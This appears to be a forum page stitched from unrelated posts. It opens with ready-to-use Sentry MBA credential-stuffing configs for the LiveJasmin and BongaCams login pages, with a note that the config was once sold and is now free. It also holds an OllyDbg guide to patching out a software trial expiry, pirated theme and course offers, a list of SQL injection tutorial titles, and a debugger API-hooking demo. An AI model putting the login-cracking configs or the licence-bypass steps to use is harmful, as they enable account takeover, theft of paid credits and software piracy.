Leaderboard

[Wordlist] aaalist=22484 aalist=4105 New Text Document=0 [Settings] SiteURL=https://auth.livejasmin.com/en/member/login Timeout=30 WaitBot=0 ResolveHost=0 ProxyActivate=0 ProxyRatio=4 ProxyCombo=0 WaitTime=5 BanWindowWidth=1 BanWindowRatio=10 BanWindowProxies=10 RequestMethod=2 HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive| ComboFilter=0 UsernameStart=6 UsernameEnd=8 PasswordStart=6 PasswordEnd=8 InvalidChars= UserPass=0 Referer=0 POSTData=nick=<USER>&password=<PASS>&resolution=1920x1200&java=1&login=Click+here+to+Log+in ComboMode=0 AllowedChars= Letters=0 Digits=0 Alpha=0 LowerUpper=0 LetterDigit=0 SpeciaChar=0 PasswordInvalidChars= PasswordAllowedChars= PasswordLetters=0 PasswordDigits=0 PasswordAlpha=0 PasswordLowerUpper=0 PasswordLetterDigit=0 PasswordSpeciaChar=0 blnNoProxies=0 blnHTTPSProxies=1 [Keywords] EnableHeaderSuccess=0 EnableHeaderBan=0 EnableHeaderFail=0 EnableHeaderRetry=0 HeaderSuccess= HeaderBan= HeaderFail= HeaderRetry= nableSourceSuccess=1 EnableSourceBan=0 EnableSourceFail=1 EnableSourceRetry=1 EnableGlobalSourceRetry=1 SourceSuccess=Account Balance;Current balance SourceBan= SourceFail=<NOT>||Wrong text!&&Invalid user/password;<p>Please be advised, that your account has been closed due to security reasons by SourceRetry=<ORetry>||Wrong text! [Fake] AfterFP=0 Success=3 MetaRedirect=0 CheckHits=0 EnableConHits=0 ConHits=0 BanEmpty=0 FollowRedirect=1 EnableConLength=0 ConLength=-1 SourceTags=1 [Form] Username=nick Password=password AddData=resolution=1920x1200&java=1&login=Click+here+to+Log+in Action=https://auth.livejasmin.com/en/member/login Cookie=is_https_enabled=1; language=en ReqReferer= ReqCookie= AjaxURL= AjaxPOSTData= AjaxData= AjaxParsingCode= RefData= ParsingCode= FormRedirectUrl=https://secure.lalibcosupport.com/livejasmin/addcredit2.php?lang=en&s=1&blank=true&accbal=true&PS=PS&livejasmin_session= FormRedirectCondition=>Log Out<span> DataDesc=Credits&Credits CaptureParsingCode=\t\t\tYou have\t\t\t<strong>|</&\t\tYou have\t\t<strong>|</ RefreshSession=1 RefreshCookie=0 GetAnswer=0 GetAnswerAjax=0 FormHeader=0 AjaxHeader=0 Recursive=0 [OCR] OCRMode=0 URLMode=0 ImageURLID=/en/captcha/captcha Captcha= FixedImageURL= blnContrast=0 blnBrightness=0 blnSaturation=0 blnThreshold=0 blnInvert=0 blnNoise=0 blnIsolate=0 blnResize=0 blnBorder=0 blnCharExtract=0 blnRemoveColors=0 blnStringFilter=0 blnLetter=1 blnDigits=0 blnBlur=0 blnReconstruct=0 blnLower=0 blnUpper=0 blnRemoveLines=0 blnMultiChar=0 blnCharTable=0 blnPalette=0 blnCharResize=0 blnCharSubExtraction=0 blnThreeImages=0 Contrast=0 Brightness=0 Saturation=0 Threshold=242 Noise=1 Isolate=1 Resize=1 BorderLeft=5 BorderTop=5 BorderRight=5 BorderBottom=5 CharExtractMinBlack=0 CharExtractMaxBlack=1 CharExtractMinWidth=1 CharRotateMax=0 CharRotateSteps=5 MinLength=0 MaxLength=0 BlurRadius=1 CharExtractMaxWidth=50 CharWidthMinBlack=9 CharSpace=3 Range=0 InvertDensity=0 InvertLength=20 LineCurvatureMax=4 LineWidthMax=13 CharResize=1 CharHeight=13 CharExclude= SpecialChars= Colors= Colors2= Lines=Min Length: 2, Max Width: 5, Horizzontal Language=eng OCRKey= blnGif=0 GifStart=2 GifOffset=2 [Ajax] Variables=Test||Post Action||None||Cookie||livejasmin_session||None||None||Username||||-1||-1||0 PostElements=None&&None&&None&&None&&None&&None&&None&&None&&Test&&None RedURL=

Abstract The objective of writing this paper is to explain how to crack an executable without peeping at its source code by using the OllyDbg tool. Although, there are many tools that can achieve the same objective, the beauty behind OllyDbg is that it is simple to operate and freely available. We have already done much reverse engineering of .NET applications earlier. This time, we are confronted with an application whose origin is unknown altogether. In simple terms, we are saying that we don’t have the actual source code. We have only the executable version, which is a tedious task of reverse engineering. Essentials The security researcher must have a rigorous knowledge of assembly programming language. It is expected that the machine is configured with the following tools: OllyDbg Assembly programming knowledge CFF explorer Patching Native Binaries When the source code is not provided, it is still possible to patch the corresponding software binaries in order to remove various security restrictions imposed by the vendor, as well as fixing the inherent bugs in the source code. A familiar type of restriction built into software is copy protection, which is normally forced by the software vendor in order to test the robustness of the software copy protection. In copy protection, the user is typically obliged to register the product before use. The vendor stipulates a time restriction on the beta software in order to avoid license misuse and to permit the product to run only in a reduced-functionality mode until the user registers. Executable Software The following sample shows a way of bypassing or removing the copy protection in order to use the product without extending the trial duration or, in fact, without purchasing the full version. The copy protection mechanism often involves a process in which the software checks whether it should run and, if it should, which functionality should be allowed. One type of copy protection common in trial or beta software allows a program to run only until a certain date. In order to explain reverse engineering, we have downloaded the beta version of software from the Internet that is operative for 30 days. As you can see, the following trial software application is expired and not working further and it shows an error message when we try to execute it. We don’t know in which programming language or under which platform this software is developed, so the first task is to identify its origin. We can engage CFF explorer, which displays some significant information such as that this software is developed by using VC++ language, as shown below. We can easily conclude that this is a native executable and it is not executing under CLR. We can’t use ILDASM or Reflector in order to analyze its opcodes. This time, we have to choose some different approach to crack the native executable. Disassembling with OllyDbg When we attempt to load the SoftwareExpiration.exe file, it will refuse to run because the current date is past the date on which the authorized trial expired. How can we use this software despite the expiration of the trial period? The following section illustrates the steps in the context of removing the copy protection restriction: The Road Map Load the expired program in order to understand what is happening behind the scenes. Debug this program with OllyDbg. Trace the code backward to identify the code path. Modify the binary to force all code paths to succeed and to never hit the trial expiration code path again. Test the modifications. Such tasks can also be accomplished by a powerful tool, IDA Pro, but it is commercial and not available freely. OllyDbg is not as powerful as IDA Pro, but it is useful in some scenarios. First download OllyDbg from its official website and configure it properly on your machine. Its interface looks like this: Now open the SoftwareExpiration.exe program in OllyDbg IDE from File à open menu and it will decompile that binary file. Don’t be afraid of the bizarre assembly code, because all the modifications are performed in the native assembly code. Here the red box shows the entry point instructions of the program, referred to as 00401204. The CPU main thread window displays the software code in form of assembly instructions that are executed in top-to-bottom fashion. That is why, as we stated earlier, assembly programming knowledge is necessary when reverse engineering a native executable. Unfortunately, we don’t have the actual source code, so how can we inspect the assembly code? Here the error message “Sorry, this trial software has expired” might help us to solve this problem because, with the help of this error message, we can identify the actual code path that leads to it. While the error dialog box is still displayed, start debugging by pressing F9 or from Debug menu. Now you can find the time limit code. Next, press F12 in order to pause the code execution so that we can find the code that causes the error message to be displayed. Okay. Now view the call stack by pressing the Alt+ K. Here, you can easily figure out that the trial error text is a parameter of MessageBoxA as follows: Select the USER32.MessageBoxA near the bottom of the call stack, right click, and choose “Show call”: This shows the starting point in which the assembly call to MessageBoxA is selected. Notice that the greater symbol (>) next to some of the lines of code, which indicates that another line of code jumps to that location. Directly before the call to MessageBoxA (in red color right-pane), four parameters are pushed onto the stack. Here the PUSH 10 instruction contains the > sign, which is referenced by another line of code. Select the PUSH 10 instruction located at 004011C0 address, the line of code that references the selected line is displayed in the text area below the top pane in the CPU windows as follows: Select the text area code in the above figure and right click to open the shortcut menu. It allows you to easily navigate to the code that refers to a selected line of code as shown: We have now identified the actual line of code that is responsible for producing the error message. Now it is time to do some modification to the binary code. The context menu in the previous figure shows that both 00401055 and 00401063 contains JA (jump above) to the PUSH 10 used for message box. First select the Go to JA 00401055 from the context menu. You should now be on the code at location 0×00401055. Your ultimate objective is to prevent the program from hitting the error code path. This can be accomplished by changing the JA instruction to NOP (no operation), which actually does nothing. Right click the 0×00401055 instruction inside the CPU window and select “Binary” and click over Fill with NOPs as shown below: This operation fills all the corresponding instruction for 0×00401055 with NOPs: Go back to PUSH 10 by pressing hyphen (~) and repeat the previous process for the instruction 0×00401063, as follows: Now save the modifications by right-clicking in the CPU window, clicking Copy to Executable, and then clicking All Modifications. Then hit the Copy all button in the next dialog box, as shown below: Right after hitting the “Copy all” button, a new window will appear named “SoftwareExpiration.exe.” Right-click in this window and choose Save File: Finally, save the modified or patched binary with a new name. Now load the modified program; you can see that no expiration error message is shown. We successfully defeated the expiration trial period restriction. Final Note This article demonstrates one way to challenge the strength of the copy protection measure using OllyDbg and to identify ways to make your software more secure against unauthorized consumption. By attempting to defeat the copy protection of your application, we can learn a great deal about how robust the protection mechanism is. By doing this testing before the product becomes publically available, we can modify the code to make circumvention of copy protection more difficult before its release. Source

Aici aveti configul de la videochat bongacams.com introduceti acest config, adaugand un combo bun, si proxy list, dupa care ca sa aveti succes la conturi si sa fie cat mai multe tokens, pe ele, analizati pagina din sentry.mba dati refresh si la tokens.. bafta! [Wordlist] UserIndex=1 PassIndex=2 EmailIndex=0 E01C7EEF952FBC8FD18F3C76F4963198=0 [Settings] SiteURL=http://en.bongacams.com/login Timeout=20 WaitBot=0 ResolveHost=0 ComboFilter=0 ComboMode=0 EmailFilter=0 EmailMode=0 UsernameStart=6 UsernameEnd=8 InvalidChars= AllowedChars= Letters=0 Digits=0 Alpha=0 Email=0 LowerUpper=0 LetterDigit=0 SpeciaChar=0 PasswordStart=6 PasswordEnd=8 PasswordInvalidChars= PasswordAllowedChars= PasswordLetters=0 PasswordDigits=0 PasswordAlpha=0 PasswordEmail=0 PasswordLowerUpper=0 PasswordLetterDigit=0 PasswordSpeciaChar=0 ProxyActivate=10 ProxyRatio=4 ProxyCombo=0 WaitTime=5 BanWindowWidth=1 BanWindowRatio=10 BanWindowProxies=10 blnNoProxies=0 HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive| RequestMethod=2 Referer=0 POSTData=log_in%5Busername%5D=<USER>&log_in%5Bpassword%5D=<PASS>&security_log_additional_info=&log_in%5Bremember%5D=1 [Fake] AfterFP=1 blnSuccess=0 SuccessRetries=3 blnProcessErrors=0 blnCompleteNot=1 EnableConHits=0 ConHits=0 FollowRedirect=1 EnableConLength=0 ConLength=-1 SourceTags=1 UserField=0 HTTPFollow=1 blnForbToOK=0 ForbToOkLength=1000 blnBadOcrCode=0 BadOcrCodeRetries=3 [Keywords] EnableHeaderSuccess=0 EnableHeaderBan=0 EnableHeaderFail=0 EnableHeaderRetry=0 HeaderSuccess= HeaderBan= HeaderFail= HeaderRetry= EnableGlobalSourceRetry=1 EnableSourceSuccess=1 EnableSourceBan=0 EnableSourceFail=1 EnableSourceRetry=0 SourceSuccess=>Logout< SourceBan= SourceFail=The username or password is invalid.;>Join now for free&&/forgot-password">Forgot password?<;>Logout<&&>0</span>#26nbsp#3Btokens< SourceRetry= [Form] IAParse=0 LoginPostData= LoginMethod=1 LoginHeader=0 Action=http://en.bongacams.com/login Username=log_in%5Busername%5D Password=log_in%5Bpassword%5D Email= AddData=security_log_additional_info=&log_in%5Bremember%5D=1 CustomData= NoIndex= Cookie=warning18=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22en_GB%22%3B%7D; bonga20120608=25c1bfe86d81bdd238bb0d7a8db38e95 IAction=-1 IUser=-1 IPass=-1 IEmail=-2 ICaptcha=-1 ReqReferer= ReqCookie= AjaxURL= AjaxPOSTData= AjaxData= AjaxParsingCode= RefData= ParsingCode= FormRedirectUrl= RedPostData= RedKeys= DataDesc=Tokens left&MemberShip Type CaptureParsingCode=/members/purchase-tokens"><span>|</span>#26nbsp#3Btokens<|#00|#00|0|#00|#00|0&>Membership:#26nbsp#3B<span class="gold">|</|#00|#00|0|#00|#00|0 RefreshSession=0 RefreshCookie=1 FormHeader=0 AjaxHeader=0 RedHeader=0 IAMethod=2 POSTMethod=2 RedMethod=1 ImageAfterAjax=0 blnBasic=0 FollowRedirectsOnIA=0 FollowRedirectsOnRed=1 [Ajax] Variables= PostElements2= RedURL= [OCR] OCRMode=0 URLMode=0 ImageURLID=|| Captcha= OCRKey= RefreshCaptcha=0 blnContrast=0 blnBrightness=0 blnSaturation=0 blnThreshold=0 blnInvert=0 blnNoise=0 blnIsolate=0 blnResize=0 blnBorder=0 blnCharExtract=0 blnRemoveColors=0 blnStringFilter=0 blnLetter=1 blnDigits=1 blnBlur=0 blnReconstruct=0 blnLower=0 blnUpper=0 blnRemoveLines=0 blnMultiChar=0 blnCharTable=0 blnPalette=0 blnCharResize=0 blnCharSubExtraction=0 blnThreeImages=0 blnGif=0 blnCompute=0 blnBorderPre=0 Contrast=0 Brightness=0 Saturation=0 Threshold=0 Noise=1 Isolate=1 Resize=2 BorderLeft=0 BorderTop=0 BorderRight=0 BorderBottom=0 CharExtractMinBlack=0 CharExtractMaxBlack=1 CharExtractMinWidth=1 CharRotateMax=0 CharRotateSteps=5 MinLength=1 MaxLength=10 BlurRadius=1 CharExtractMaxWidth=33 CharWidthMinBlack=2 CharSpace=1 Range=0 InvertDensity=0 InvertLength=20 LineCurvatureMax=4 LineWidthMax=13 CharResize=1 CharHeight=13 GifStart=2 GifOffset=2 BorderLeftPre=0 BorderTopPre=0 BorderRightPre=0 BorderBottomPre=0 CharBorderH=5 CharBorderV=5 CharRotateBorder=5 CharExtractMinHeight=1 VerticalRejoin=30 CharExclude= SpecialChars= Colors= Colors2= Lines=Min Length: 2, Max Width: 5, Horizzontal Language=eng lam vandut pe 50 de euro,dar va dau gratis azi

If you want Download all pleace visit in my home page http://preshare4u.com 1. BetterMag v1.6 – News, Blog, Magazine WordPress Theme Theme Features Most Useful & Powerful WordPress Magazine, News, Blog and Shop Theme. Clean and Modern design with mutliple style and skin in one theme. Fully Responsive design: All elements are responsive. 11 Style: Two advanced style with 11 skin included by default. http://preshare4u.com/bettermag-v1-6-news-blog-magazine-wordpress-theme/ 2. Pai v1.1 – Simple and Clean Business Corporate Template Pai is The Simple and Clean Business, Corporate Template built with latest WordPress features. Custom Post Type, Unlimited Colors and Background Uploader etc. http://preshare4u.com/pai-v1-1-simple-and-clean-business-corporate-template/ 3. Richer v2.1.8 – Responsive Multi-Purpose Theme Update: Version 2.1.8 is now released! Great novations are implemented, they perfectly amplify the existing features. You can check the changelog at the bottom of this page for more details and examples. http://preshare4u.com/richer-v2-1-8-responsive-multi-purpose-theme/

BitDefender Total Security 2015 ofera protectie completa cu un motor antivirus premiat, firewall performant, control parental, anti-phishing, anti spam, protectie web si comportamentala si imbunatateste performantele PC-ului tau. Acum il poti avea gratuit timp de 6 luni printr-o promotie speciala. Acceseaza link-ul de mai jos si completeaza adresa de email si codul captcha: Free Bitdefender 2015 Licenta initiala este pentru 6 luni si se va reinnoi automat in februarie 2015 pe inca 6 luni. -> Sursa: BitDefender Total Security 2015 – un an licenta GRATUITA (promotie noua)

Salut. Ofer tutoriale gratis de pe udemy . com, doar ce este video, daca este slideshow sau orice altceva, nu pot oferi. Lasati un link cu orice tutorial doriti. PS: Trebuie sa aveti minim 150 postari( sa nu imi pierd timpul degeaba ). PS2: Nu pot oferi structura care e pe site la ei, ci fisierele vor avea numele care au fost uploadate, deci rugativa ca cei de le-au urcat sa fi pus numere in fata.

Here’s our large collection of SQL Injection related resources. This list has something for everyone, from those just starting out to the most senior ethical hackers. What is an SQL Injection? An Introduction SQL Injection Demo Cookie Based SQL Injection SQL Injection through HTTP Headers SQL Injection with SQLmap Blind SQL Injection: Attack Anatomy Dumping a Database using SQL Injection Testing for SQL Injection with sqlmap Fuzzing for SQL Injection w/ Burp Suite Intruder SQL Truncation Attack Parameterized SQL Query over Dynamic SQL Query Gaining Reverse Shell from SQL Injection SQL Injection through SQLMap Burp Plugin Creating Backdoors Using SQL Injection SQLi Labs Tutorial SQLNuke: MySQL Injection load_file() Fuzzer Double Query Injections Demystified Advanced SQLMap Tutorial Source

RevEngX RevEngX is a freely available extension for the Debugging Tools for Windows. It offers several new commands to simplify the work of reverse engineering, code injection, hooking and other types of instrumentation that are useful when analyzing 3rd party software, malware, or developing commercial Windows applications that utilize code injection and hooking. This article will demonstrate how one might produce and test a hook on-the-fly using the debugger alone. In practice, it would be easier to code up hook functions in C++ in a DLL, inject the DLL using !loadlibrary (a RevEngX command), and then set hooks pointing to the injected code using any of a number of methods. The technique presented in this article is designed more for demonstrating the power of the tools being presented, and to introduce the reader to a new world of possibilities. Prerequisites It is expected that the reader is familiar with the basics of the Debugging Tools for Windows package. Windbg.exe will be used in the example, but ntsd.exe and cdb.exe may also be used if preferred. The reader should also be familiar with x86 assembly language and have some understanding of the techniques used to hook APIs on Windows. Obviously a basic understanding of Windows APIs is also necessary. RevEngX is needed as well. It can be downloaded from RevEngX.com - Reverse Engineering Extensions - Andrew L. Sandoval. Obtain the most recent version and install RevEngX.dll in the winext directory for the matching bitness of the debugger. Newer versions of the Debugging Tools for Windows package install both the 32-bit and 64-bit versions of the tools. It is important to match of the RevEngX extension to the right bitness of the debugger, and to use the 32-bit version of windbg.exe for debugging 32-bit applications with RevEngX, and the 64-bit version for 64-bit applications. Many of the RevEngX command are bit-immune, but some are not, and it is always best to match your debugger to the bitness of the application being debugged, unless you are debugging or reversing WOW64 thunks, etc. Note that while the example is using x86 assembly language, it could easily be done with x64 (amd64) assembly as well, given a bit of work rewriting the hook function mnemonics. A Visual Example This example will use a simple Import Address Table (IAT) hook. Such a hook employs no stealth – it is easily detectable using RevEngX or other tools that can locate hooks (such as GMER). A very stealthy hook can also be implemented using RevEngX and the debugger, but this is beyond the scope of this article. In order to make the demonstration very visual as well as simple, we will hook the GDI function responsible for displaying text. Our hook function will reverse the strings being sent to ExtTextOutW before invoking the original function. You can choose any target you would like, but in the example below I will use the 32-bit version of Calculator (calc.exe). The visual result will be hard to miss. Step 1: Launch Calculator (or your preferred target) Step one is simple, launch calc.exe. If you are running on a 64-bit version of Windows, be sure to run the 32-bit version. To do this just run c:/windows/syswow64/calc.exe. It should look … well, very normal: Step 2: Attach the Debugger The second step is to start the debugger and attach it to the target application. There are numerous ways to do this, and it depends upon where your Debugging Tools for Windows are installed. For this example I’m going to assume you know how to start the debugger. Just use F6 and select calc.exe to attach the debugger. (Yes, I know it sounds like a baby-step, and it is, but that’s just in case someone blew off that particular prerequisite.) You should now be able to enter commands into the debugger, with it stopped in the debugger injected thread: Step 3: Load RevEngX Okay, this is a baby step too if you are familiar with debugger extensions, but just in case… Just run: .load RevEngX as shown below. To get a list of the currently supported commands available in RevEngX, enter !help: The list of commands is too long to display in a single screenshot, but you get the idea. There is a lot here and only a few commands will be used in this article. Many of the ones shown are helpers used in breakpoints for analyzing a target process or system (yes, some of them were even meant to be used from a kernel debugger.) Step 4: Setup Memory for our Hook Function To set up the memory for our hook function we could simple use .dvalloc (see the debugger’s help for details). In this example, however, I’m going to use RevEngX’s !callfn function to do the same thing. The difference is that .dvalloc will allocate memory from the debugger using VirtualAllocEx, supplying the handle to the target process. !callfn on the other hand will invoke VirtualAlloc in the target process. Either one will work, but when I originally wrote the commands it was for a lecture in which the target processes were already hooked and the students needed to discover how it was done. To simplify setting this up on 30 machines, the debugging commands were all designed to be copy-pasted into the debugger. !callfn conveniently tracks the return value from the call to VirtualAlloc for us, where we would otherwise have to copy-paste it, or re-type it from the output of .dvalloc. Enter the first command as follows: !callfn @$t0 = kernel32!VirtualAlloc(NULL, 1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) This will cause RevEngX to build and inject the code needed to call VirtualAlloc with the parameters shown in the target process. It will also invoke the call and store the return value in the pseudo-register $t0. The debugger output should reassure you of this: Step 5: Setup Synthetic Variables Strictly speaking, you can get by without any synthetic variables, but you will see that when we assemble our hook function, having them is much easier! In fact, I’m surprised that I had to add this to my extension. It is such a powerful thing that it should be built-in to the debugger. To declare our variables, run the following commands (you can copy-paste them all at once): !synmod HOOKTEST @$t0 !synsym g_pfnExtTextOutWp2 @$t0 !synsym g_pfnwcsrev g_pfnExtTextOutWp2+4 !synsym g_pfnwcslen g_pfnExtTextOutWp2+8 !synsym g_pfnwcsncpy g_pfnExtTextOutWp2+c !synsym HookExtTextOutW g_pfnExtTextOutWp2+20 By way of explanation, !synmod sets up a synthetic module. That means that the block of memory we allocated, and which is pointed to by $t0 will look like a DLL called HOOKTEST to the debugger. Each !synsym command names a synthetic variable or “symbol” and associates an address with it. The variables created are as follows: g_pfnExtTextOutWp2 This symbol holds the address of the real ExtTextOutW function. It will be invoked by our hook after reversing the input string. g_pfnwcsrev This is a pointer to the _wcsrev function in the CRT which our hook will utilize. g_pfnwcslen This is a pointer to the wcslen function in the CRT g_pfnwcsncpy_ This is a pointer to the wcsncpy function in the CRT HookExtTextOutW This is the address of our Hook Function, called HookExtTextOutW. Step 6: Fill in our “variables” The first 4 synthetic symbols setup in step 5 are all pointers to function pointers. We need them to hold the actual values of the target functions to which they point. Copy-paste or enter the following commands to fill them in: ed g_pfnExtTextOutWp2 GDI32!ExtTextOutW+2 ed g_pfnwcsrev msvcrt!_wcsrev ed g_pfnwcslen msvcrt!wcslen ed g_pfnwcsncpy msvcrt!wcsncpy dds g_pfnExtTextOutWp2 g_pfnwcsncpy This should be fairly self-explanatory. If not, look at the debugger’s help for the ed command. The last command will display the result of what we just did. The output should look like that shown in the screenshot below where the highlight is found: Step 7: Build the Hook Function The hook function is fairly simple. If it were more complex we would want to write it in C or C++ (there are very good reasons to use C++ that you might not realize, such as those outlined in this article: Exceptions In Injected Code - InfoSec Institute). In this example however, we are only going to reverse the input string – and only if it isn’t too long for us to reasonably do so in simple assembly code. For now, just copy-paste the assembly commands below. Be sure to hit enter one final time to get out of “Input>” mode. a HookExtTextOutW push ebp mov ebp, esp sub esp, 1000 push ebx mov ebx, dword ptr [ebp+1C] push esi push edi mov edi, dword ptr [ebp+20] test ebx, ebx je HookExtTextOutW+0x6c test edi, edi je HookExtTextOutW+0x6c mov esi, edi cmp edi, FFFFFFFF jne HookExtTextOutW+0x2e push ebx call dword ptr [g_pfnwcslen] pop ecx mov esi, eax cmp esi, 800 ja HookExtTextOutW+0x6c push esi lea eax, [ebp-1000] push ebx push eax call dword ptr [g_pfnwcsncpy] xor eax, eax mov word ptr [ebp+esi*2-1000], ax lea eax, [ebp-1000] push eax call dword ptr [g_pfnwcsrev] add esp, 10 push dword ptr [ebp+24] lea eax, [ebp-1000] push edi push eax jmp HookExtTextOutW+0x71 push dword ptr [ebp+24] push edi push ebx push dword ptr [ebp+18] push dword ptr [ebp+14] push dword ptr [ebp+10] push dword ptr [ebp+C] push dword ptr [ebp+8] call dword ptr [g_pfnExtTextOutWp2] pop edi pop esi pop ebx leave ret 20 When you are done, you should be back to a prompt that looks like this: Now I will briefly explain the assembly. I’m not going to go into detail – you should see what I’m pointing out right away if you are comfortable with x86 assembly language. Feel free to skip to the next step if you already get it 0:004> uf HookExtTextOutW HOOKTEST!HookExtTextOutW: 02400020 55 push ebp 02400021 8bec mov ebp,esp 02400023 81ec00100000 sub esp,1000h 02400029 53 push ebx 0240002a 8b5d1c mov ebx,dword ptr [ebp+1Ch] 0240002d 56 push esi 0240002e 57 push edi 0240002f 8b7d20 mov edi,dword ptr [ebp+20h] 02400032 85db test ebx,ebx 02400034 7456 je HOOKTEST!HookExtTextOutW+0x6c (0240008c) This first section starts with a normal prologue. The stack is setup to reserve 0×1000 bytes of space. That is so that we have a good sized buffer in which to hold our reversed copy of the input string. You will recall that the prototype for ExtTextOutW is as follows: BOOL ExtTextOut( _In_ HDC hdc, _In_ int X, _In_ int Y, _In_ UINT fuOptions, _In_ const RECT *lprc, _In_ LPCTSTR lpString, _In_ UINT cbCount, _In_ const INT *lpDx ); After our prologue code runs, ebp is used to access the input parameters. This means that [ebp+1Ch] points to the input string. This pointer is copied into ebx. After preserving registers on the stack, edi will hold the cbCount (length) of the string from [ebp+20h]. Finally, the test and je check for a nullptr input string. When the input string is NULL we simply call the original function with the original parameters and return its return value. The three instructions at HOOKTEST!HookExtTextOutW+0x6c: are used just for this purpose. The next block of disassembly shows us doing exactly the same thing if the string length is 0: HOOKTEST!HookExtTextOutW+0x16: 02400036 85ff test edi,edi 02400038 7452 je HOOKTEST!HookExtTextOutW+0x6c (0240008c) At this point we should have a valid input string and either a length or -1 indicating that the string is null terminated. The next block of code looks for the -1, and if found it calls wcslen to get the length of the string: HOOKTEST!HookExtTextOutW+0x1a: 0240003a 8bf7 mov esi,edi 0240003c 81ffffffffff cmp edi,0FFFFFFFFh 02400042 750a jne HOOKTEST!HookExtTextOutW+0x2e (0240004e) HOOKTEST!HookExtTextOutW+0x24: 02400044 53 push ebx 02400045 ff1508004002 call dword ptr [HOOKTEST!g_pfnwcslen (02400008)] 0240004b 59 pop ecx 0240004c 8bf0 mov esi,eax In either case, the length of the string is stored in esi. If the value is not -1 to start with, that happens at 0240003a, otherwise esi is updated at 0240004c with wcslen results. Next one more test is made to see if the string is longer than 0×800 bytes. 0×800 times 2 for wide characters is 0×1000. That is all we can handle. If the string is longer the original function is invoked without reversing the string: HOOKTEST!HookExtTextOutW+0x2e: 0240004e 81fe00080000 cmp esi,800h 02400054 7736 ja HOOKTEST!HookExtTextOutW+0x6c (0240008c) The next block of code copies the original string to our stack buffer, and then reverses it by calling _wcsrev: HOOKTEST!HookExtTextOutW+0x36: 02400056 56 push esi 02400057 8d8500f0ffff lea eax,[ebp-1000h] 0240005d 53 push ebx 0240005e 50 push eax 0240005f ff150c004002 call dword ptr [HOOKTEST!g_pfnwcsncpy (0240000c)] 02400065 31c0 xor eax,eax 02400067 6689847500f0ffff mov word ptr [ebp+esi*2-1000h],ax 0240006f 8d8500f0ffff lea eax,[ebp-1000h] 02400075 50 push eax 02400076 ff1504004002 call dword ptr [HOOKTEST!g_pfnwcsrev (02400004)] 0240007c 83c410 add esp,10h 0240007f ff7524 push dword ptr [ebp+24h] 02400082 8d8500f0ffff lea eax,[ebp-1000h] 02400088 57 push edi 02400089 50 push eax 0240008a eb05 jmp HOOKTEST!HookExtTextOutW+0x71 (02400091) You will notice that there is also some code in there to ensure NULL termination prior to calling _wcsrev. This is needed because while ExtTextOutW doesn’t require a null terminated string, _wcsrev does. Also, of all of the functions invoked, only _wcsrev is cdecl, requiring its parameters to be cleaned from the stack at 0240007c. Starting at 02400088, the pointer to our reversed string and its length (length first) are pushed to the stack to setup the last two arguments of the call to the real ExtTextOutW function. The jmp at 0240008a is used to jump over our code that pushes the original string and original length values when they do not meet our criteria in the tests prior to the copy and reverse: HOOKTEST!HookExtTextOutW+0x6c: 0240008c ff7524 push dword ptr [ebp+24h] 0240008f 57 push edi 02400090 53 push ebx The final block of code pushes the remaining original arguments on to the stack and invokes the original ExtTextOutW function. HOOKTEST!HookExtTextOutW+0x71: 02400091 ff7518 push dword ptr [ebp+18h] 02400094 ff7514 push dword ptr [ebp+14h] 02400097 ff7510 push dword ptr [ebp+10h] 0240009a ff750c push dword ptr [ebp+0Ch] 0240009d ff7508 push dword ptr [ebp+8] 024000a0 ff1500004002 call dword ptr [HOOKTEST!g_pfnExtTextOutWp2 (02400000)] 024000a6 5f pop edi 024000a7 5e pop esi 024000a8 5b pop ebx 024000a9 c9 leave 024000aa c22000 ret 20h Starting at 024000a6 the epilogue code cleans up our stack and returns the results of ExtTextOutW to the caller. That is it. It is fairly simple. (Did you see a bug?) And, it is short enough to be easily tested in the debugger. Step 8: Setting the Hook RevEngX offers the !iatentry command to allow viewing IAT (Import Address Table) entries. The same command may also be used to setup an IAT hook. Before we set a hook, run the !iatentry command to see where ExtTextOutW is invoked via import table in this process. Enter !iatentry ExtTextOutW. The output should look something like this: 0:004> !iatentry ExtTextOutW Symbol Address: GDI32!ExtTextOutW (76df8b7a) Module Name: GDI32 Image Name: C:/Windows/syswow64/GDI32.dll Loaded Image Name: C:/Windows/syswow64/GDI32.dll IAT_ADDR ACTUAL SYMBOL IMPORTER 724d0544 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:WindowsSysWOW64UxTheme.dll 7113115c GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2COMCTL32.dll 6ed51168 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:WindowsWinSxSx86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18120_none_72d2e82386681b36gdiplus.dll 767d0254 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssystem32IMM32.DLL 75341078 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64LPK.dll 764e14a8 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64MSCTF.dll 75372158 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64SHELL32.dll 76b4123c GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64SHLWAPI.dll 75230258 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64USER32.dll 75181004 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64USP10.dll From this you can see that several DLLS call gdi32!ExtTextOutW through their import tables. Calc.exe itself does not, but other DLL’s it uses for displaying strings are listed. We can now set an IAT hook on all of those imports using: !iatentry ExtTextOutW -set HookExtTextOutW. The output should look similar to what is in the screenshot below: Step 9: Detach the Debugger and let the application run… We are now ready to let this rip. You could simply enter ‘g’ at the prompt and let it run in the debugger. I recommend that for the first time. Once you are confident you have it right you can simply enter .detach to detach the debugger from the process and let it run. From there you can ‘q’uit or exit the debugger. Your running copy of Calculator should now have visual evidence of your hook as shown below: You will notice that things don’t just reverse automatically. They have to be redrawn. Running the mouse over the buttons is all it takes in calc to get them to redraw. 